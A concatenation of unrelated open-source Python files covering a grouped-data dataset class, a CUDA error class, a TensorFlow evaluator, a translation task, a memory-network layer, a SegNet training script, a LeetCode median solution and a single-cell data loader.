def _set_dependent_params(self, doc_range, nDocTotal=None):
self.nObs = self.X.shape[0]
self.dim = self.X.shape[1]
self.nDoc = self.doc_range.size - 1
if nDocTotal is None:
self.nDocTotal = self.nDoc
else:
self.nDocTotal = int(nDocTotal)
def _check_dims(self):
assert self.X.ndim == 2
assert self.X.flags.c_contiguous
assert self.X.flags.owndata
assert self.X.flags.aligned
assert self.X.flags.writeable
assert self.doc_range.ndim == 1
assert self.doc_range.size == self.nDoc + 1
assert self.doc_range[0] == 0
assert self.doc_range[-1] == self.nObs
assert np.all(self.doc_range[1:] - self.doc_range[:-1] >= 0)
def get_size(self):
return self.nDoc
def get_total_size(self):
return self.nDocTotal
def get_dim(self):
return self.dim
def get_text_summary(self):
''' Returns human-readable description of this dataset
'''
if hasattr(self, 'summary'):
s = self.summary
else:
s = 'GroupXData'
return s
def get_stats_summary(self):
''' Returns human-readable summary of this dataset's basic properties
'''
s = ' size: %d units (documents)\n' % (self.get_size())
s += ' dimension: %d' % (self.get_dim())
return s
def toXData(self):
''' Return simplified XData instance, losing group structure
'''
if hasattr(self, 'TrueParams'):
TParams = self.TrueParams
else:
TParams=None
if hasattr(self, 'Xprev'):
return XData(self.X, Xprev=self.Xprev, TrueParams=TParams)
else:
return XData(self.X, TrueParams=TParams)
# Create Subset
#########################################################
def make_subset(self,
docMask=None,
atomMask=None,
doTrackTruth=False,
doTrackFullSize=True):
""" Get subset of this dataset identified by provided unit IDs.
Parameters
-------
docMask : 1D array_like of ints
Identifies units (documents) to use to build subset.
doTrackFullSize : boolean, optional
default=True
If True, return DataObj with same nDocTotal value as this
dataset. If False, returned DataObj has smaller size.
atomMask : 1D array_like of ints, optional
default=None
If present, identifies rows of X to return as XData
Returns
-------
Dchunk : bnpy.data.GroupXData instance
"""
if atomMask is not None:
return self.toXData().select_subset_by_mask(atomMask)
if len(docMask) < 1:
raise ValueError('Cannot select empty subset')
newXList = list()
newXPrevList = list()
newDocRange = np.zeros(len(docMask) + 1)
newPos = 1
for d in range(len(docMask)):
start = self.doc_range[docMask[d]]
stop = self.doc_range[docMask[d] + 1]
newXList.append(self.X[start:stop])
if hasattr(self, 'Xprev'):
newXPrevList.append(self.Xprev[start:stop])
newDocRange[newPos] = newDocRange[newPos - 1] + stop - start
newPos += 1
newX = np.vstack(newXList)
if hasattr(self, 'Xprev'):
newXprev = np.vstack(newXPrevList)
else:
newXprev = None
if doTrackFullSize:
nDocTotal = self.nDocTotal
else:
nDocTotal = None
if hasattr(self, 'alwaysTrackTruth'):
doTrackTruth = doTrackTruth or self.alwaysTrackTruth
hasTrueZ = hasattr(self, 'TrueParams') and 'Z' in self.TrueParams
if doTrackTruth and hasTrueZ:
TrueZ = self.TrueParams['Z']
newTrueZList = list()
for d in range(len(docMask)):
start = self.doc_range[docMask[d]]
stop = self.doc_range[docMask[d] + 1]
newTrueZList.append(TrueZ[start:stop])
newTrueZ = np.hstack(newTrueZList)
assert newTrueZ.size == newDocRange[-1]
else:
newTrueZ = None
return GroupXData(newX, newDocRange,
Xprev=newXprev,
nDocTotal=nDocTotal,
TrueZ=newTrueZ)
def add_data(self, XDataObj):
""" Appends (in-place) provided dataset to this dataset.
Post Condition
-------
self.Data grows by adding all units from provided DataObj.
"""
if not self.dim == XDataObj.dim:
raise ValueError("Dimensions must match!")
self.nObs += XDataObj.nObs
self.nDocTotal += XDataObj.nDocTotal
self.nDoc += XDataObj.nDoc
self.X = np.vstack([self.X, XDataObj.X])
if hasattr(self, 'Xprev'):
self.Xprev = np.vstack([self.Xprev, XDataObj.Xprev])
new_doc_range = XDataObj.doc_range[1:] + self.doc_range[-1]
self.doc_range = np.hstack([self.doc_range, new_doc_range])
self._check_dims()
def get_random_sample(self, nDoc, randstate=np.random):
nDoc = np.minimum(nDoc, self.nDoc)
mask = randstate.permutation(self.nDoc)[:nDoc]
Data = self.select_subset_by_mask(mask, doTrackFullSize=False)
return Data
def __str__(self):
return self.X.__str__()
def getRawDataAsSharedMemDict(self):
''' Create dict with copies of raw data as shared memory arrays
'''
dataShMemDict = dict()
dataShMemDict['X'] = numpyToSharedMemArray(self.X)
dataShMemDict['doc_range'] = numpyToSharedMemArray(self.doc_range)
dataShMemDict['nDocTotal'] = self.nDocTotal
if hasattr(self, 'Xprev'):
dataShMemDict['Xprev'] = numpyToSharedMemArray(self.Xprev)
return dataShMemDict
def getDataSliceFunctionHandle(self):
""" Return function handle that can make data slice objects.
Useful with parallelized algorithms,
when we need to use shared memory.
Returns
-------
f : function handle
"""
return makeDataSliceFromSharedMem
def makeDataSliceFromSharedMem(dataShMemDict,
cslice=(0, None),
batchID=None):
""" Create data slice from provided raw arrays and slice indicators.
Returns
-------
Dslice : namedtuple with same fields as GroupXData object
* X
* nObs
* nObsTotal
* dim
Represents subset of documents identified by cslice tuple.
Example
-------
>>> Data = GroupXData(np.random.rand(25,2), doc_range=[0,4,12,25])
>>> shMemDict = Data.getRawDataAsSharedMemDict()
>>> Dslice = makeDataSliceFromSharedMem(shMemDict)
>>> np.allclose(Data.X, Dslice.X)
True
>>> np.allclose(Data.nObs, Dslice.nObs)
True
>>> Data.dim == Dslice.dim
True
>>> Aslice = makeDataSliceFromSharedMem(shMemDict, (0, 2))
>>> Aslice.nDoc
2
>>> np.allclose(Aslice.doc_range, Dslice.doc_range[0:(2+1)])
True
"""
if batchID is not None and batchID in dataShMemDict:
dataShMemDict = dataShMemDict[batchID]
# Make local views (NOT copies) to shared mem arrays
doc_range = sharedMemToNumpyArray(dataShMemDict['doc_range'])
X = sharedMemToNumpyArray(dataShMemDict['X'])
nDocTotal = int(dataShMemDict['nDocTotal'])
dim = X.shape[1]
if cslice is None:
cslice = (0, doc_range.size - 1)
elif cslice[1] is None:
cslice = (0, doc_range.size - 1)
tstart = doc_range[cslice[0]]
tstop = doc_range[cslice[1]]
keys = ['X', 'Xprev', 'doc_range', 'nDoc', 'nObs', 'dim', 'nDocTotal']
if 'Xprev' in dataShMemDict:
Xprev = sharedMemToNumpyArray(dataShMemDict['Xprev'])[tstart:tstop]
else:
Xprev = None
Dslice = namedtuple("GroupXDataTuple", keys)(
X=X[tstart:tstop],
Xprev=Xprev,
doc_range=doc_range[cslice[0]:cslice[1] + 1] - doc_range[cslice[0]],
nDoc=cslice[1] - cslice[0],
nObs=tstop - tstart,
dim=dim,
nDocTotal=nDocTotal,
)
return Dslice
|
numba/cuda/simulator/cudadrv/error.py | auderson/numba | 6,620 | 22333 | class CudaSupportError(RuntimeError):
pass
|
BiBloSA/exp_SICK/src/evaluator.py | mikimaus78/ml_monorepo | 116 | 22344 | from configs import cfg
from src.utils.record_log import _logger
import numpy as np
import tensorflow as tf
import scipy.stats as stats
class Evaluator(object):
def __init__(self, model):
self.model = model
self.global_step = model.global_step
## ---- summary----
self.build_summary()
self.writer = tf.summary.FileWriter(cfg.summary_dir)
def get_evaluation(self, sess, dataset_obj, global_step=None):
_logger.add()
_logger.add('getting evaluation result for %s' % dataset_obj.data_type)
logits_list, loss_list = [], []
target_score_list, predicted_score_list = [], []
for sample_batch, _, _, _ in dataset_obj.generate_batch_sample_iter():
feed_dict = self.model.get_feed_dict(sample_batch, 'dev')
logits, loss, predicted_score = sess.run([self.model.logits, self.model.loss,
self.model.predicted_score], feed_dict)
logits_list.append(np.argmax(logits, -1))
loss_list.append(loss)
predicted_score_list.append(predicted_score)
for sample in sample_batch:
target_score_list.append(sample['relatedness_score'])
logits_array = np.concatenate(logits_list, 0)
loss_value = np.mean(loss_list)
target_scores = np.array(target_score_list)
predicted_scores = np.concatenate(predicted_score_list, 0)
# pearson, spearman, mse
pearson_value = stats.pearsonr(target_scores, predicted_scores)[0]
spearman_value = stats.spearmanr(target_scores, predicted_scores)[0]
mse_value = np.mean((target_scores - predicted_scores) ** 2)
# todo: analysis
# analysis_save_dir = cfg.mkdir(cfg.answer_dir, 'gs_%d' % global_step or 0)
# OutputAnalysis.do_analysis(dataset_obj, logits_array, accu_array, analysis_save_dir,
# cfg.fine_grained)
if global_step is not None:
if dataset_obj.data_type == 'train':
summary_feed_dict = {
self.train_loss: loss_value,
self.train_pearson: pearson_value,
self.train_spearman: spearman_value,
self.train_mse: mse_value,
}
summary = sess.run(self.train_summaries, summary_feed_dict)
self.writer.add_summary(summary, global_step)
elif dataset_obj.data_type == 'dev':
summary_feed_dict = {
self.dev_loss: loss_value,
self.dev_pearson: pearson_value,
self.dev_spearman: spearman_value,
self.dev_mse: mse_value,
}
summary = sess.run(self.dev_summaries, summary_feed_dict)
self.writer.add_summary(summary, global_step)
else:
summary_feed_dict = {
self.test_loss: loss_value,
self.test_pearson: pearson_value,
self.test_spearman: spearman_value,
self.test_mse: mse_value,
}
summary = sess.run(self.test_summaries, summary_feed_dict)
self.writer.add_summary(summary, global_step)
return loss_value, (pearson_value, spearman_value, mse_value)
# --- internal use ------
def build_summary(self):
with tf.name_scope('train_summaries'):
self.train_loss = tf.placeholder(tf.float32, [], 'train_loss')
self.train_pearson = tf.placeholder(tf.float32, [], 'train_pearson')
self.train_spearman = tf.placeholder(tf.float32, [], 'train_spearman')
self.train_mse = tf.placeholder(tf.float32, [], 'train_mse')
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_loss', self.train_loss))
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_pearson', self.train_pearson))
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_spearman', self.train_spearman))
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_mse', self.train_mse))
self.train_summaries = tf.summary.merge_all('train_summaries_collection')
with tf.name_scope('dev_summaries'):
self.dev_loss = tf.placeholder(tf.float32, [], 'dev_loss')
self.dev_pearson = tf.placeholder(tf.float32, [], 'dev_pearson')
self.dev_spearman = tf.placeholder(tf.float32, [], 'dev_spearman')
self.dev_mse = tf.placeholder(tf.float32, [], 'dev_mse')
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_loss',self.dev_loss))
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_pearson', self.dev_pearson))
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_spearman', self.dev_spearman))
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_mse', self.dev_mse))
self.dev_summaries = tf.summary.merge_all('dev_summaries_collection')
with tf.name_scope('test_summaries'):
self.test_loss = tf.placeholder(tf.float32, [], 'test_loss')
self.test_pearson = tf.placeholder(tf.float32, [], 'test_pearson')
self.test_spearman = tf.placeholder(tf.float32, [], 'test_spearman')
self.test_mse = tf.placeholder(tf.float32, [], 'test_mse')
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_loss',self.test_loss))
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_pearson', self.test_pearson))
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_spearman', self.test_spearman))
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_mse', self.test_mse))
self.test_summaries = tf.summary.merge_all('test_summaries_collection')
|
pytorch_translate/tasks/translation_from_pretrained_xlm.py | dzhulgakov/translate | 748 | 22345 | <gh_stars>100-1000
#!/usr/bin/env python3
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
from fairseq import options, tokenizer
from fairseq.tasks import register_task
from pytorch_translate import constants
from pytorch_translate.data.masked_lm_dictionary import MaskedLMDictionary
from pytorch_translate.tasks.pytorch_translate_task import PytorchTranslateTask
@register_task("pytorch_translate_translation_from_pretrained_xlm")
class PytorchTranslateTranslationFromPretrainedXLMTask(PytorchTranslateTask):
"""
Same as TranslationTask except use the MaskedLMDictionary class so that
we can load data that was binarized with the MaskedLMDictionary class.
This task should be used for the entire training pipeline when we want to
train an NMT model from a pretrained XLM checkpoint: binarizing NMT data,
training NMT with the pretrained XLM checkpoint, and subsequent evaluation
of that trained model.
"""
@staticmethod
def add_args(parser):
PytorchTranslateTask.add_args(parser)
"""Add task-specific arguments to the parser."""
parser.add_argument(
"--save-only", action="store_true", help="skip eval and only do save"
)
@classmethod
def load_dictionary(cls, filename):
"""Load the masked LM dictionary from the filename
Args:
filename (str): the filename
"""
return MaskedLMDictionary.load(filename)
@classmethod
def build_dictionary(
cls, filenames, workers=1, threshold=-1, nwords=-1, padding_factor=8
):
"""Build the dictionary
Args:
filenames (list): list of filenames
workers (int): number of concurrent workers
threshold (int): defines the minimum word count
nwords (int): defines the total number of words in the final dictionary,
including special symbols
padding_factor (int): can be used to pad the dictionary size to be a
multiple of 8, which is important on some hardware (e.g., Nvidia
Tensor Cores).
"""
d = MaskedLMDictionary()
for filename in filenames:
MaskedLMDictionary.add_file_to_dictionary(
filename, d, tokenizer.tokenize_line, workers
)
d.finalize(threshold=threshold, nwords=nwords, padding_factor=padding_factor)
return d
@classmethod
def setup_task(cls, args, **kwargs):
args.left_pad_source = options.eval_bool(args.left_pad_source)
# Load dictionaries
source_dict = MaskedLMDictionary.load(args.source_vocab_file)
target_dict = MaskedLMDictionary.load(args.target_vocab_file)
source_lang = args.source_lang or "src"
target_lang = args.target_lang or "tgt"
print(f"| [{source_lang}] dictionary: {len(source_dict)} types")
print(f"| [{target_lang}] dictionary: {len(target_dict)} types")
use_char_source = (args.char_source_vocab_file != "") or (
getattr(args, "arch", "") in constants.ARCHS_FOR_CHAR_SOURCE
)
if use_char_source:
char_source_dict = MaskedLMDictionary.load(args.char_source_vocab_file)
# this attribute is used for CharSourceModel construction
args.char_source_dict_size = len(char_source_dict)
else:
char_source_dict = None
return cls(args, source_dict, target_dict, char_source_dict)
|
drugresnet/seya/layers/memnn2.py | Naghipourfar/CCLE | 429 | 22346 | <gh_stars>100-1000
import theano.tensor as T
import keras.backend as K
from keras.layers.core import LambdaMerge
from keras import initializations
class MemN2N(LambdaMerge):
def __init__(self, layers, output_dim, input_dim, input_length,
memory_length, hops=3, bow_mode="bow", mode="adjacent",
emb_init="uniform", init="glorot_uniform", **kwargs):
self.output_dim = output_dim
self.input_dim = input_dim
self.input_length = input_length
self.memory_length = memory_length
self.hops = hops
self.bow_mode = bow_mode
self.mode = mode
self.init = initializations.get(init)
self.emb_init = initializations.get(emb_init)
output_shape = (self.output_dim, )
super(MemN2N, self).__init__(layers, lambda x: x, output_shape)
def build(self):
# list of embedding layers
self.outputs = []
self.memory = []
# self.Hs = [] # if self.mode == "rnn"
self.trainable_weights = []
for i in range(self.hops):
# memory embedding - A
if self.mode == "adjacent" and i > 0:
A = self.outputs[-1]
else:
A = self.emb_init((self.input_dim, self.output_dim),
name="{}_A_{}".format(self.name, i))
self.trainable_weights += [A]
self.memory.append(A)
# outputs embedding - C
# if self.mode == "adjacent" and i > 1:
# Wo = self.outputs[-1]
# elif self.mode == "untied" or i == 0:
C = self.emb_init((self.input_dim, self.output_dim),
name="{}_C_{}".format(self.name, i))
self.trainable_weights += [C]
self.outputs.append(C)
# if self.mode == "rnn"
# H = self.init((self.output_dim, self.output_dim),
# name="{}_H_{}".format(self.name, i))
# self.trainable_weights += [H]
# b = K.zeros((self.input_dim,),
# name="{}_b_{}".format(self.name, i))
# self.Hs += [H]
# self.trainable_weights += [H]
if self.mode == "adjacent":
self.W = self.outputs[-1].T
self.b = K.zeros((self.input_dim,), name="{}_b".format(self.name))
# self.trainable_weights += [self.b]
# question embedding - B
self.B = self.emb_init((self.input_dim, self.output_dim),
name="{}_B".format(self.name))
self.trainable_weights += [self.B]
# Temporal embedding
self.Te = self.emb_init((self.input_length, self.output_dim))
self.trainable_weights += [self.Te]
def get_output(self, train=False):
inputs = [layer.get_output(train) for layer in self.layers]
facts, question = inputs
# WARN make sure input layers are Embedding layers with identity init
# facts = K.argmax(facts, axis=-1)
# question = K.argmax(question, axis=-1)
u, mask_q = self.lookup(question, self.B, 1) # just 1 question
for A, C in zip(self.memory, self.outputs):
m, mask_m = self.lookup(facts, A, self.memory_length)
c, mask_c = self.lookup(facts, C, self.memory_length)
# attention weights
p = self.attention(m, u, mask_m)
# output
o = self.calc_output(c, p)
u = o + u
# u = K.dot(u[:, 0, :], self.W) + self.b
return u[:, 0, :] # K.softmax(u)
def lookup(self, x, W, memory_length):
# shape: (batch*memory_length, input_length)
x = K.cast(K.reshape(x, (-1, self.input_length)), 'int32')
mask = K.expand_dims(K.not_equal(x, 0.), dim=-1)
# shape: (batch*memory_length, input_length, output_dim)
X = K.gather(W, x)
if self.bow_mode == "bow":
# shape: (batch*memory_length, output_dim)
X = K.sum(X + K.expand_dims(self.Te, 0), axis=1)
# shape: (batch, memory_length, output_dim)
X = K.reshape(X, (-1, memory_length, self.output_dim))
return X, mask
def attention(self, m, q, mask):
# mask original shape is (batch*memory_length, input_length, 1)
# shape (batch, memory)
mask = K.reshape(mask[:, 0], (-1, self.memory_length))
# shape: (batch, memory_length, 1)
p = T.batched_tensordot(m, q, (2, 2))
# shape: (batch, memory_length)
p = K.softmax(p[:, :, 0]) # * K.cast(mask, 'float32')
# shape: (batch, 1, memory_length)
return K.expand_dims(p, dim=1)
def calc_output(self, c, p):
# shape: (batch, memory_length, 1)
p = K.permute_dimensions(p, (0, 2, 1))
# shape: (batch, output_dim)
o = K.sum(c * p, axis=1)
# if self.mode == "rnn":
# import theano
# W = theano.printing.Print('[Debug] W shape: ', attrs=("shape",))(W)
# o = K.dot(o, W) + b
# shape: (batch, 1, output_dim)
return K.expand_dims(o, dim=1)
|
Segnet/训练.py | 1044197988/- | 186 | 22354 | #coding=utf-8
import matplotlib
matplotlib.use("Agg")
import tensorflow as tf
import argparse
import numpy as np
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D,MaxPooling2D,UpSampling2D,BatchNormalization,Reshape,Permute,Activation
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.callbacks import ModelCheckpoint
from sklearn.preprocessing import LabelEncoder
from PIL import Image
import matplotlib.pyplot as plt
import cv2
import random
import os
from tqdm import tqdm
seed = 7
np.random.seed(seed)
#设置图像大小
img_w = 32
img_h = 32
#分类
n_label=6
classes=[0.0,17.0,34.0,51.0,68.0,255.0]
labelencoder = LabelEncoder()
labelencoder.fit(classes)
#训练批次和每次数据量
EPOCHS = 5
BS = 32
#图像最大值
divisor=255.0
#图像根路径
filepath ='C:\\Users\Administrator\Desktop\Project\src\\'
#读取图片
def load_img(path, grayscale=False):
if grayscale:
img = cv2.imread(path,cv2.IMREAD_GRAYSCALE)
else:
img = cv2.imread(path)
img = np.array(img,dtype="float") / divisor
return img
#获取训练数据和测试数据地址
def get_train_val(val_rate = 0.25):
train_url = []
train_set = []
val_set = []
for pic in os.listdir(filepath + 'train'):
train_url.append(pic)
random.shuffle(train_url)
total_num = len(train_url)
val_num = int(val_rate * total_num)
for i in range(len(train_url)):
if i < val_num:
val_set.append(train_url[i])
else:
train_set.append(train_url[i])
return train_set,val_set
# 生成训练数据
def generateData(batch_size,data=[]):
while True:
train_data = []
train_label = []
batch = 0
for i in (range(len(data))):
url = data[i]
batch += 1
img = load_img(filepath + 'train/' + url)
img = img_to_array(img)
train_data.append(img)
label = load_img(filepath + 'label/' + url, grayscale=True)
label = img_to_array(label).reshape((img_w * img_h,))
train_label.append(label)
if batch % batch_size==0:
train_data = np.array(train_data)
train_label = np.array(train_label).flatten() #拍平
train_label = labelencoder.transform(train_label)
train_label = to_categorical(train_label, num_classes=n_label) #编码输出便签
train_label = train_label.reshape((batch_size,img_w,img_h,n_label))
yield (train_data,train_label)
train_data = []
train_label = []
batch = 0
#生成测试的数据
def generateValidData(batch_size,data=[]):
while True:
valid_data = []
valid_label = []
batch = 0
for i in (range(len(data))):
url = data[i]
batch += 1
img = load_img(filepath + 'train/' + url)
img = img_to_array(img)
valid_data.append(img)
label = load_img(filepath + 'label/' + url, grayscale=True)
label = img_to_array(label).reshape((img_w * img_h,))
valid_label.append(label)
if batch % batch_size==0:
valid_data = np.array(valid_data)
valid_label = np.array(valid_label).flatten()
valid_label = labelencoder.transform(valid_label)
valid_label = to_categorical(valid_label, num_classes=n_label)
valid_label = valid_label.reshape((batch_size,img_w,img_h,n_label))
yield (valid_data,valid_label)
valid_data = []
valid_label = []
batch = 0
#定义模型-网络模型
def SegNet():
model = Sequential()
#encoder
model.add(Conv2D(64,(3,3),strides=(1,1),input_shape=(img_w,img_h,3),padding='same',activation='relu',data_format='channels_last'))
model.add(BatchNormalization())
model.add(Conv2D(64,(3,3),strides=(1,1),padding='same',activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2,2)))
#(128,128)
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2,2)))
#(64,64)
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
#(32,32)
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
#(16,16)
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
#(8,8)
#decoder
model.add(UpSampling2D(size=(2,2)))
#(16,16)
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(UpSampling2D(size=(2, 2)))
#(32,32)
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(UpSampling2D(size=(2, 2)))
#(64,64)
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(UpSampling2D(size=(2, 2)))
#(128,128)
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(UpSampling2D(size=(2, 2)))
#(256,256)
model.add(Conv2D(64, (3, 3), strides=(1, 1), input_shape=(img_w, img_h,3), padding='same', activation='relu',data_format='channels_last'))
model.add(BatchNormalization())
model.add(Conv2D(64, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(n_label, (1, 1), strides=(1, 1), padding='same'))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy',optimizer='sgd',metrics=['accuracy'])
model.summary()
return model
#开始训练
def train(args):
model = SegNet()
modelcheck = ModelCheckpoint(args['model'],monitor='val_acc',save_best_only=True,mode='max')
callable = [modelcheck,tf.keras.callbacks.TensorBoard(log_dir='.')]
train_set,val_set = get_train_val()
train_numb = len(train_set)
valid_numb = len(val_set)
print ("the number of train data is",train_numb)
print ("the number of val data is",valid_numb)
H = model.fit(x=generateData(BS,train_set),steps_per_epoch=(train_numb//BS),epochs=EPOCHS,verbose=2,
validation_data=generateValidData(BS,val_set),validation_steps=(valid_numb//BS),callbacks=callable)
# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
N = EPOCHS
plt.plot(np.arange(0, N), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, N), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, N), H.history["acc"], label="train_acc")
plt.plot(np.arange(0, N), H.history["val_acc"], label="val_acc")
plt.title("Training Loss and Accuracy on SegNet Satellite Seg")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="lower left")
plt.savefig(args["plot"])
#获取参数
def args_parse():
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-a", "--augment", help="using data augment or not",
action="store_true", default=False)
ap.add_argument("-m", "--model", required=False,default="segnet.h5",
help="path to output model")
ap.add_argument("-p", "--plot", type=str, default="plot.png",
help="path to output accuracy/loss plot")
args = vars(ap.parse_args())
return args
#运行程序
if __name__=='__main__':
args = args_parse()
train(args)
print("完成")
#predict()
|
Python/295. FindMedianFromDataStream.py | nizD/LeetCode-Solutions | 263 | 22355 | <reponame>nizD/LeetCode-Solutions<filename>Python/295. FindMedianFromDataStream.py<gh_stars>100-1000
"""
Problem:
--------
Design a data structure that supports the following two operations:
- `void addNum(int num)`: Add a integer number from the data stream to the data structure.
- `double findMedian()`: Return the median of all elements so far.
"""
class MedianFinder:
def __init__(self):
"""
Initialize your data structure here.
"""
self.list = []
def addNum(self, num: int) -> None:
# Traverse through the list and check if `num` > ith element
# If yes, insert `num` in that index
# This keeps the list sorted at all times
for i in range(len(self.list)):
if num > self.list[i]:
self.list.insert(i, num)
return
# If `num` is the largest element or is the first one to be added
self.list.append(num)
def findMedian(self) -> float:
# Find index of the middle element (floor division by 2)
mid_index = len(self.list) // 2
if len(self.list) % 2 == 0:
# If number of elements = EVEN
# Return average of the middle 2 elements
return (self.list[mid_index - 1] + self.list[mid_index]) / 2
else:
# If number of elements = ODD
# Return the middle element
return self.list[mid_index]
# Your MedianFinder object will be instantiated and called as such:
# obj = MedianFinder()
# obj.addNum(num)
# param_2 = obj.findMedian()
|
openproblems/data/human_blood_nestorowa2016.py | bendemeo/SingleCellOpenProblems | 134 | 22356 | from . import utils
import os
import scanpy as sc
import scprep
import tempfile
URL = "https://ndownloader.figshare.com/files/25555751"
@utils.loader
def load_human_blood_nestorowa2016(test=False):
"""Download Nesterova data from Figshare."""
if test:
# load full data first, cached if available
adata = load_human_blood_nestorowa2016(test=False)
# Subsample data
adata = adata[:, :500].copy()
utils.filter_genes_cells(adata)
sc.pp.subsample(adata, n_obs=500)
# Note: could also use 200-500 HVGs rather than 200 random genes
# Ensure there are no cells or genes with 0 counts
utils.filter_genes_cells(adata)
return adata
else:
with tempfile.TemporaryDirectory() as tempdir:
filepath = os.path.join(tempdir, "human_blood_nestorowa2016.h5ad")
scprep.io.download.download_url(URL, filepath)
adata = sc.read(filepath)
# Ensure there are no cells or genes with 0 counts
utils.filter_genes_cells(adata)
return adata
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.